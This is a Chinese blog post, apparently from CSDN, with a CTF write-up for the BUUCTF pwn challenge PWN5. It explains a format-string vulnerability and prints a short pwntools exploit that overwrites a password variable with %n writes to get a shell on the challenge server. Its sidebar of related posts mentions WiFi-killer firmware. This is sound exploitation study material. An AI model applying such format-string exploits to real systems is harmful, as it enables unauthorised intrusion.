BUUCTF-Pwn-[第五空间2019 决赛]PWN5

最新推荐文章于 2024-04-11 16:24:58 发布
最新推荐文章于 2024-04-11 16:24:58 发布
阅读量352 收藏
点赞数
分类专栏: CTF Pwn 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/122930963
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
检查文件信息
在这里插入图片描述
这是一个32位的程序,开启了NX和Canary
用IDA打开查看找到来能getshell的代码
在这里插入图片描述
反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell
在这里插入图片描述
测试我们输入的内容在栈中的位置,是第10个
在这里插入图片描述
exp

from pwn import*

r=remote('node4.buuoj.cn',28850) 
addr=0x804c044
payload=p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3)
payload+=b'%10$n%11$n%12$n%13$n'
r.sendlineafter(b':', payload)
r.recvline()
r.sendline(str(0x10101010).encode('utf-8'))
r.interactive() #开启交互
餐桌上的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 609
简单易懂~
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4325
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
Buuctf第五空间决赛2024]pwn5
最新发布
2401_83974345的博客
04-11 793
发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞3.“访问”构造Python脚本偏移量为10)
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 461
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 976
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
[第五空间2019 决赛]PWN5
weixin_44982854的博客
03-05 138
这里以一个pwn题作为例子,该逆向后的函数结构比自我构建的函数要困难,不再进行我自己编写,直接分析题目。该pwn题涉及搜索中漏洞问题。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF [第五空间2019 决赛]PWN5
m0_54262894的博客
10-27 208
先checksec,开启了NX保护和Canary保护 也就意味着不能用栈溢出来攻击了 运行一下 放入ida中 查看main函数 我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限 但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据 看到了printf(buf); 说明存在格式化字符串漏洞 先计算偏移 我们可以算出偏移为10(从AAAA到41414141) ...
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 406
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 395
buuctf-pwn 001-016题wp
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 369
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 796
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 221
buuctf-pwn 039~046题
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值